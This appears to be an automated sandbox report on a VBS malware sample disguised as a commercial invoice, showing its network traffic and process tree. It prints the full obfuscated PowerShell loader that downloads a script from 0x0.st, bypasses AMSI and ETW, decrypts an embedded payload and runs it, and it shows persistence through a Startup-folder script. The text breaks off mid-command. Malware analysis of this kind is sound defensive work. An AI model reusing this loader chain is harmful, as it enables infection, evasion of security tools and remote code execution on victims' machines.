                                        0192.168.2.849706132.226.247.73808044C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        Feb 18, 2025 08:24:34.512546062 CET151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Feb 18, 2025 08:24:35.178303003 CET273INHTTP/1.1 200 OK
                                        Date: Tue, 18 Feb 2025 07:24:35 GMT
                                        Content-Type: text/html
                                        Content-Length: 104
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                        Feb 18, 2025 08:24:35.184533119 CET127OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Feb 18, 2025 08:24:35.388596058 CET273INHTTP/1.1 200 OK
                                        Date: Tue, 18 Feb 2025 07:24:35 GMT
                                        Content-Type: text/html
                                        Content-Length: 104
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.849711132.226.247.73801984C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        Feb 18, 2025 08:24:50.694785118 CET151OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Connection: Keep-Alive
                                        Feb 18, 2025 08:24:51.362696886 CET273INHTTP/1.1 200 OK
                                        Date: Tue, 18 Feb 2025 07:24:51 GMT
                                        Content-Type: text/html
                                        Content-Length: 104
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                        Feb 18, 2025 08:24:51.365309000 CET127OUTGET / HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                        Host: checkip.dyndns.org
                                        Feb 18, 2025 08:24:51.587985039 CET273INHTTP/1.1 200 OK
                                        Date: Tue, 18 Feb 2025 07:24:51 GMT
                                        Content-Type: text/html
                                        Content-Length: 104
                                        Connection: keep-alive
                                        Cache-Control: no-cache
                                        Pragma: no-cache
                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                        HTTPS Proxied Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.849705168.119.145.1174438044C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2025-02-18 07:24:33 UTC159OUTGET /8ZDa.txt HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: 0x0.st
                                        Connection: Keep-Alive
                                        2025-02-18 07:24:33 UTC611INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 18 Feb 2025 07:24:33 GMT
                                        Content-Type: text/plain; charset=utf-8
                                        Content-Length: 9193
                                        Last-Modified: Thu, 13 Feb 2025 16:29:51 GMT
                                        Connection: close
                                        Vary: Accept-Encoding
                                        ETag: "67ae1dff-23e9"
                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                        X-Frame-Options: sameorigin
                                        X-Content-Type-Options: nosniff
                                        X-XSS-Protection: 1; mode=block
                                        Content-Security-Policy: default-src 'none'; media-src 'self'; style-src 'none' 'unsafe-inline'; img-src 'self'
                                        Referrer-Policy: no-referrer, strict-origin-when-cross-origin
                                        Accept-Ranges: bytes
                                        2025-02-18 07:24:33 UTC9193INData Raw: 66 75 6e 63 74 69 6f 6e 20 49 6e 76 6f 6b 65 2d 53 79 73 74 65 6d 41 6d 73 69 42 79 70 61 73 73 20 7b 0d 0a 20 20 20 20 5b 43 6d 64 6c 65 74 42 69 6e 64 69 6e 67 28 29 5d 0d 0a 20 20 20 20 70 61 72 61 6d 20 28 0d 0a 20 20 20 20 20 20 20 20 5b 50 61 72 61 6d 65 74 65 72 28 50 61 72 61 6d 65 74 65 72 53 65 74 4e 61 6d 65 20 3d 20 27 49 6e 74 65 72 66 61 63 65 27 2c 20 4d 61 6e 64 61 74 6f 72 79 20 3d 20 24 66 61 6c 73 65 2c 20 50 6f 73 69 74 69 6f 6e 20 3d 20 30 29 5d 0d 0a 20 20 20 20 20 20 20 20 5b 73 77 69 74 63 68 5d 20 24 56 65 72 62 6f 73 65 4f 75 74 70 75 74 2c 0d 0a 0d 0a 20 20 20 20 20 20 20 20 5b 50 61 72 61 6d 65 74 65 72 28 50 61 72 61 6d 65 74 65 72 53 65 74 4e 61 6d 65 20 3d 20 27 49 6e 74 65 72 66 61 63 65 27 2c 20 4d 61 6e 64 61 74 6f 72 79
                                        Data Ascii: function Invoke-SystemAmsiBypass { [CmdletBinding()] param ( [Parameter(ParameterSetName = 'Interface', Mandatory = $false, Position = 0)] [switch] $VerboseOutput, [Parameter(ParameterSetName = 'Interface', Mandatory


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.849707104.21.16.14438044C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2025-02-18 07:24:35 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2025-02-18 07:24:35 UTC855INHTTP/1.1 200 OK
                                        Date: Tue, 18 Feb 2025 07:24:35 GMT
                                        Content-Type: text/xml
                                        Content-Length: 362
                                        Connection: close
                                        Age: 95244
                                        Cache-Control: max-age=31536000
                                        cf-cache-status: HIT
                                        last-modified: Mon, 17 Feb 2025 04:57:11 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MQmsDwDsmkFdA7PM%2Bkp9uU0pAB3WaZ0ycLSHmCCbRM9Z6CNOfR%2FCtSkKxlYrE93hWKbNmrCm6XtpfQOp0Zfiu%2BPT13o1szlGUfuNR45Sua%2BrTLyUrwAUjnH32wha2kKWzwg3deZ1"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 913c47449d2f41ba-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1725&rtt_var=655&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1660034&cwnd=198&unsent_bytes=0&cid=a0bfca836e470405&ts=145&x=0"
                                        2025-02-18 07:24:35 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.849710168.119.145.1174431984C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2025-02-18 07:24:49 UTC159OUTGET /8ZDa.txt HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                        Host: 0x0.st
                                        Connection: Keep-Alive
                                        2025-02-18 07:24:49 UTC611INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 18 Feb 2025 07:24:49 GMT
                                        Content-Type: text/plain; charset=utf-8
                                        Content-Length: 9193
                                        Last-Modified: Thu, 13 Feb 2025 16:29:51 GMT
                                        Connection: close
                                        Vary: Accept-Encoding
                                        ETag: "67ae1dff-23e9"
                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                        X-Frame-Options: sameorigin
                                        X-Content-Type-Options: nosniff
                                        X-XSS-Protection: 1; mode=block
                                        Content-Security-Policy: default-src 'none'; media-src 'self'; style-src 'none' 'unsafe-inline'; img-src 'self'
                                        Referrer-Policy: no-referrer, strict-origin-when-cross-origin
                                        Accept-Ranges: bytes
                                        2025-02-18 07:24:49 UTC9193INData Raw: 66 75 6e 63 74 69 6f 6e 20 49 6e 76 6f 6b 65 2d 53 79 73 74 65 6d 41 6d 73 69 42 79 70 61 73 73 20 7b 0d 0a 20 20 20 20 5b 43 6d 64 6c 65 74 42 69 6e 64 69 6e 67 28 29 5d 0d 0a 20 20 20 20 70 61 72 61 6d 20 28 0d 0a 20 20 20 20 20 20 20 20 5b 50 61 72 61 6d 65 74 65 72 28 50 61 72 61 6d 65 74 65 72 53 65 74 4e 61 6d 65 20 3d 20 27 49 6e 74 65 72 66 61 63 65 27 2c 20 4d 61 6e 64 61 74 6f 72 79 20 3d 20 24 66 61 6c 73 65 2c 20 50 6f 73 69 74 69 6f 6e 20 3d 20 30 29 5d 0d 0a 20 20 20 20 20 20 20 20 5b 73 77 69 74 63 68 5d 20 24 56 65 72 62 6f 73 65 4f 75 74 70 75 74 2c 0d 0a 0d 0a 20 20 20 20 20 20 20 20 5b 50 61 72 61 6d 65 74 65 72 28 50 61 72 61 6d 65 74 65 72 53 65 74 4e 61 6d 65 20 3d 20 27 49 6e 74 65 72 66 61 63 65 27 2c 20 4d 61 6e 64 61 74 6f 72 79
                                        Data Ascii: function Invoke-SystemAmsiBypass { [CmdletBinding()] param ( [Parameter(ParameterSetName = 'Interface', Mandatory = $false, Position = 0)] [switch] $VerboseOutput, [Parameter(ParameterSetName = 'Interface', Mandatory


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.849712104.21.16.14431984C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampBytes transferredDirectionData
                                        2025-02-18 07:24:52 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2025-02-18 07:24:52 UTC861INHTTP/1.1 200 OK
                                        Date: Tue, 18 Feb 2025 07:24:52 GMT
                                        Content-Type: text/xml
                                        Content-Length: 362
                                        Connection: close
                                        Age: 95260
                                        Cache-Control: max-age=31536000
                                        cf-cache-status: HIT
                                        last-modified: Mon, 17 Feb 2025 04:57:11 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6tbUCLzOgExcmd1d36zb%2B%2FXw8mAKYnSc2NTQVXPEAdVHEBvfhMwzD2wxYd3qLIn005GKD3jmfm04K4Xq9G9%2F7xhcABGohtOkXvl4%2B0%2FAuQHYL0K32uD%2BK2isgH4I9wH0U172AGh%2B"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 913c47a9ca7641ba-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1659&rtt_var=634&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1708601&cwnd=198&unsent_bytes=0&cid=b94a7bbc13eddeeb&ts=140&x=0"
                                        2025-02-18 07:24:52 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:02:24:28
                                        Start date:18/02/2025
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Commercial Invoice Confirmation-1132346.vbs"
                                        Imagebase:0x7ff669a40000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:02:24:28
                                        Start date:18/02/2025
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat" "
                                        Imagebase:0x7ff7c0230000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:3
                                        Start time:02:24:28
                                        Start date:18/02/2025
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6ee680000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:4
                                        Start time:02:24:28
                                        Start date:18/02/2025
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat"
                                        Imagebase:0x7ff7c0230000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:5
                                        Start time:02:24:28
                                        Start date:18/02/2025
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6ee680000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:6
                                        Start time:02:24:29
                                        Start date:18/02/2025
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); "
                                        Imagebase:0x7ff7c0230000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:7
                                        Start time:02:24:29
                                        Start date:18/02/2025
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Imagebase:0xfe0000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        General

                                        Target ID:8
                                        Start time:02:24:30
                                        Start date:18/02/2025
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                        Imagebase:0xfe0000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:10
                                        Start time:02:24:45
                                        Start date:18/02/2025
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd" "
                                        Imagebase:0x7ff7c0230000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:11
                                        Start time:02:24:45
                                        Start date:18/02/2025
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6ee680000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        General

                                        Target ID:12
                                        Start time:02:24:45
                                        Start date:18/02/2025
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd"
                                        Imagebase:0x7ff7c0230000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:13
                                        Start time:02:24:45
                                        Start date:18/02/2025
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6ee680000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        General

                                        Target ID:14
                                        Start time:02:24:45
                                        Start date:18/02/2025
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object 